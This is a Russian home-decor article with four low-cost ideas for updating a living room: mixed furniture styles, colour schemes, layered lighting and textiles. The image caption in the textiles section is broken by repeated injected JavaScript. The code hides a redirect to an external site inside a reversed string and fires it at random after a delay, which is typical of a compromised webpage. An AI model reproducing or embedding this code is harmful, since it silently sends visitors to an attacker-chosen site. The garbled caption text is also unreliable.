Добавить в закладки

Недостаточно средств на грандиозный ремонт в гостиной? 4 способа решения проблемы

Найдётся немало людей, которые, перелистывая страницы журналов с яркими фотографиями современных стильных квартир, безнадёжно вздыхают. Да, не так просто полностью поменять интерьер даже одной комнаты, на это требуется много сил и денег, ведь надо нанять дизайнера, затем рабочих, купить необходимые материалы, новую мебель. Подсчитав все расходы, легче всего отказаться от каких бы то ни было преобразований.

Гостиная

Гостиная. Фото: edinstvennaya.ua

На самом деле, можно обойтись не слишком большими средствами, проявив фантазию и изучив некоторые принципы гармонизации пространства.

Принцип первый – смешение стилей

Смешение стилей

Смешение стилей. Фото: remontbp.com

Следуя этому направлению современного дизайна, не придётся полностью избавляться от старой мебели. Достаточно убрать громоздкие предметы интерьера, такие как очень популярные в советское время стенки и гарнитуры мягкой мебели, состоящие, как правило, из дивана, двух кресел и журнального столика. От стенки можно оставить книжный шкаф.

Журнальный столик тоже будет уместен. Если найдётся ещё один стол, его тоже можно использовать. Что касается мягкой мебели, гораздо интереснее смотрятся гостиные, где диван, кресло, пуф выполнены в разных стилях. Можно оставить те предметы мебели, которые лучше сохранились. Просмотрев фотографии на разных сайтах, нужно выбрать подходящий для данного помещения вариант комбинирования мебели.

Принцип второй – цветовое решение

Цветовое решение

Цветовое решение. Фото: designmyhome.ru

Выбирая цвет для гостиной, можно воспользоваться одним из двух способов. Первый способ предполагает один доминирующий цвет и яркие акценты. Если хочется использовать в интерьере больше красок, необходимо воспользоваться специальной таблицей сочетания цветов. Такую таблицу можно без труда найти в интернете.

Принцип третий – больше света

Освещение

Освещение. Фото: roomester.ru

Одна люстра посередине потолка давно стала пережитком прошлого. Источников света должно быть несколько на разных уровнях. Если нет возможности полностью менять систему освещения, можно использовать настольные лампы и торшеры. В современном дизайне интерьера торшеры применяются всё чаще. В одной комнате может быть несколько торшеров, при этом они могут быть выполнены в разном стиле.

Принцип четвёртый – использование текстиля

Текстиль

Текстиль. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tory.com/wp-content/uploads/2017/12/shtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tori-v-detskuju-svoimi-rukami-2.jpg»>loveshtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tory.com

Пледы, диванные подушки, занавески сделают любое помещение уютным и красивым. Чтобы гостиная стала просторнее и светлее, достаточно заменить тяжёлые портьеры на лёгкие и прозрачные драпировки. Диванные подушки можно сшить или связать своими руками. Они могут быть разного размера и цвета. Не нужно стараться подбирать одинаковые стандартные подушки. Это добавит излишней строгости и формальности. И, конечно, нужно отказаться от большого ковра на полу. Два маленьких мягких коврика разного цвета и формы помогут зонировать пространство и добавят уюта.

Завершат интерьер комнатные цветы, картины, несколько сувениров

Главное, не перегружать комнату деталями. Не надо пытаться использовать всё и сразу. Прежде чем приступить к преображению, желательно сделать несколько набросков, сравнить их и выбрать самый приемлемый вариант. Спешка здесь не нужна. Если есть хорошие идеи, но они не вписываются в данный проект, можно использовать их для изменения интерьера другой комнаты.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 31.07.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: